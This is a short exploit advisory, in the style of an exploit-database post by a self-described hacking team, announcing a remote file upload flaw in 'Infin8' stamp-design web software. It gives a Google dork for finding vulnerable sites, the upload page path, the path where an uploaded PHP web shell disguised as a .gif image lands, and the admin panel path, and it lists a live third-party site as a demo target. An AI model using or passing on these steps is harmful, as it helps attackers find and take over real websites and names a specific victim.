~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Infin8 <== Remote File Upload Vulnerability ------------------------------------------------------------------------------------------- [~] Title : [ Infin8 <== Remote File Upload Vulnerability ] [~] Auth0r : [ Hack Center Security Team ] [~] Discovered By : [ Net.W0lf ] [~] Software Link : [ www.infin8design.com ] [~] Impact : [ High ] [~] E-Mail : [ Bl4ck.Intell@gmail.com & Net-w0lf@att.net ] [~] Google Dork : [ inurl:"/design-your-own-stamp.php" ] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +-----------------------+ | Remote File Upload | +-----------------------+ -----[ Exploit/p0c ]----- [~] Upload Access : 127.0.0.1/[patch]/design-your-own-stamp.php [~] Shell Access : 127.0.0.1/images/uploads/upload_5612/w0lf.php.gif [~] Admin Panel : 127.0.0.1/admin/ -----[ D3m0 ]----- [~] www.craftstampsonline.co.uk/design-your-own-stamp.php [~] Greetz : | Am!r | B3HZ4D | Packetstormsecurity.org | Exploit-db.com | All Iranian PenTesTerZ [~] You Can See Us In The Dark ----------------------------------------------------------------------------------------------------